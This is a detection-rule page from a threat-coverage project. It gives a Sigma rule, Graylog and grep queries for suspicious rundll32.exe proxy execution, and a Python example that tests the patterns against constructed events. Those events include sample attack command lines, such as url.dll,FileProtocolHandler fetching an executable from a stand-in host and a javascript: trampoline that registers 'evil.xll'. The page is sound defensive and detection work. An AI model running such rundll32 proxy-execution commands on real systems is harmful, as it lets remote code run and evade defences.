atomic-threat-coverage/Atomic_Threat_Coverage/Detection_Rules/win_susp_rundll32_activity.md

Title Suspicious Rundll32 Activity
Description Detects suspicious rundll32.exe invocations (url.dll, zipfldr.dll and Shell32.dll proxy-execution exports, the javascript: trampoline, and RegisterXLL) based on the command-line arguments
ATT&CK Tactic Defense Evasion, Execution
ATT&CK Technique T1085
Data Needed
Trigger
Severity Level medium
False Positives
  • False positives depend on the scripts and administrative tools used in the monitored environment; opening Control Panel applets through Shell32.dll,Control_RunDLL is a common legitimate hit
Development Status experimental
References
  • http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/
  • https://twitter.com/Hexacorn/status/885258886428725250
  • https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
Author juju4

Detection Rules

Sigma rule

title: Suspicious Rundll32 Activity
description: Detects suspicious rundll32.exe invocations (url.dll, zipfldr.dll and Shell32.dll proxy-execution exports, the javascript: trampoline, and RegisterXLL) based on the command-line arguments
status: experimental
references:
    - http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/
    - https://twitter.com/Hexacorn/status/885258886428725250
    - https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52
tags:
    - attack.defense_evasion
    - attack.execution
    - attack.t1085
author: juju4
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine:
            - '*\rundll32.exe* url.dll,*OpenURL *'
            - '*\rundll32.exe* url.dll,*OpenURLA *'
            - '*\rundll32.exe* url.dll,*FileProtocolHandler *'
            - '*\rundll32.exe* zipfldr.dll,*RouteTheCall *'
            - '*\rundll32.exe* Shell32.dll,*Control_RunDLL *'
            - '*\rundll32.exe javascript:*'
            - '* url.dll,*OpenURL *'
            - '* url.dll,*OpenURLA *'
            - '* url.dll,*FileProtocolHandler *'
            - '* zipfldr.dll,*RouteTheCall *'
            - '* Shell32.dll,*Control_RunDLL *'
            - '* javascript:*'
            - '*.RegisterXLL*'
    condition: selection
falsepositives:
    - False positives depend on the scripts and administrative tools used in the monitored environment; opening Control Panel applets through Shell32.dll,Control_RunDLL is a common legitimate hit
level: medium
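To see what the selection above actually fires on, the following added example (not part of the ATC page, the Sigma project, or the rule author's work) translates the rule's CommandLine wildcard values into case-insensitive anchored regexes, the way Sigma string matching behaves, and runs them over a handful of constructed process_creation events. The command lines, paths and hostnames in the sample events are made up for illustration; they are not real telemetry. It shows why the rule lists each export twice (with and without a leading `\rundll32.exe`), and that a legitimate `shell32.dll,Control_RunDLL desk.cpl` hits the rule, which is the false positive the rule warns about.

```python
"""Evaluate the 'Suspicious Rundll32 Activity' Sigma selection over sample
process_creation events.  Added example, not the ATC page's or Sigma's own
code; the sample command lines below are constructed, not real telemetry."""
import re

# Wildcard values copied from the rule's selection.CommandLine list.
SIGMA_PATTERNS = [
    r'*\rundll32.exe* url.dll,*OpenURL *',
    r'*\rundll32.exe* url.dll,*OpenURLA *',
    r'*\rundll32.exe* url.dll,*FileProtocolHandler *',
    r'*\rundll32.exe* zipfldr.dll,*RouteTheCall *',
    r'*\rundll32.exe* Shell32.dll,*Control_RunDLL *',
    r'*\rundll32.exe javascript:*',
    r'* url.dll,*OpenURL *',
    r'* url.dll,*OpenURLA *',
    r'* url.dll,*FileProtocolHandler *',
    r'* zipfldr.dll,*RouteTheCall *',
    r'* Shell32.dll,*Control_RunDLL *',
    r'* javascript:*',
    r'*.RegisterXLL*',
]


def sigma_wildcard_to_regex(pattern: str) -> re.Pattern:
    """Turn a Sigma string value into an anchored, case-insensitive regex.
    '*' matches any run of characters, '?' one character; everything else
    (backslashes, dots, commas, spaces) is matched literally."""
    out = []
    for ch in pattern:
        if ch == '*':
            out.append('.*')
        elif ch == '?':
            out.append('.')
        else:
            out.append(re.escape(ch))
    return re.compile('^' + ''.join(out) + '$', re.IGNORECASE | re.DOTALL)


COMPILED = [(p, sigma_wildcard_to_regex(p)) for p in SIGMA_PATTERNS]


def match_rule(command_line: str) -> list:
    """Return every selection value the command line satisfies.  The rule's
    condition is a bare 'selection', so a single hit is enough to fire."""
    return [p for p, rx in COMPILED if rx.match(command_line)]


# Constructed process_creation events (Sysmon EID 1 / Security 4688 style
# fields).  Hostnames and paths are invented.
SAMPLE_EVENTS = [
    # url.dll FileProtocolHandler used to launch a remote executable.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe url.dll,FileProtocolHandler http://example.invalid/stage.exe"},
    # zipfldr.dll RouteTheCall with rundll32 invoked without a path: only the
    # path-less '* zipfldr.dll,*RouteTheCall *' value can catch this form.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe zipfldr.dll,RouteTheCall C:\Users\Public\calc.exe"},
    # Legitimate way to open a Control Panel applet; it matches the rule and is
    # the kind of false positive the falsepositives field warns about.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    # javascript: trampoline that registers an XLL through Excel's COM object.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'C:\Windows\System32\rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";x=new ActiveXObject("Excel.Application");x.RegisterXLL("C:\Users\Public\evil.xll")'},
    # Benign 'Open with' dialog: none of the listed export names appear.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,OpenAs_RunDLL C:\Users\bob\report.pdf"},
]


def evaluate(events: list) -> list:
    """Apply the rule to each event and return (CommandLine, matched values)
    for the events that fire."""
    hits = []
    for ev in events:
        matched = match_rule(ev.get("CommandLine", ""))
        if matched:
            hits.append((ev["CommandLine"], matched))
    return hits


if __name__ == "__main__":
    for cmd, matched in evaluate(SAMPLE_EVENTS):
        print(f"ALERT  {cmd}")
        for m in matched:
            print(f"       matched: {m}")
```

Four of the five constructed events fire; the `OpenAs_RunDLL` one does not. Note that the path-less values (`* zipfldr.dll,*RouteTheCall *` and friends) carry the detection whenever rundll32 is launched by bare name, and that every value ends in a trailing space, so an export invoked with no argument at all (for example `shell32.dll,Control_RunDLL` alone) is not matched.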

graylog

CommandLine:("*\\\\rundll32.exe* url.dll,*OpenURL *" "*\\\\rundll32.exe* url.dll,*OpenURLA *" "*\\\\rundll32.exe* url.dll,*FileProtocolHandler *" "*\\\\rundll32.exe* zipfldr.dll,*RouteTheCall *" "*\\\\rundll32.exe* Shell32.dll,*Control_RunDLL *" "*\\\\rundll32.exe javascript\\:*" "* url.dll,*OpenURL *" "* url.dll,*OpenURLA *" "* url.dll,*FileProtocolHandler *" "* zipfldr.dll,*RouteTheCall *" "* Shell32.dll,*Control_RunDLL *" "* javascript\\:*" "*.RegisterXLL*")

grep

grep -Pi '^(?:.*\\rundll32\.exe.* url\.dll,.*OpenURL .*|.*\\rundll32\.exe.* url\.dll,.*OpenURLA .*|.*\\rundll32\.exe.* url\.dll,.*FileProtocolHandler .*|.*\\rundll32\.exe.* zipfldr\.dll,.*RouteTheCall .*|.*\\rundll32\.exe.* Shell32\.dll,.*Control_RunDLL .*|.*\\rundll32\.exe javascript:.*|.* url\.dll,.*OpenURL .*|.* url\.dll,.*OpenURLA .*|.* url\.dll,.*FileProtocolHandler .*|.* zipfldr\.dll,.*RouteTheCall .*|.* Shell32\.dll,.*Control_RunDLL .*|.* javascript:.*|.*\.RegisterXLL.*)'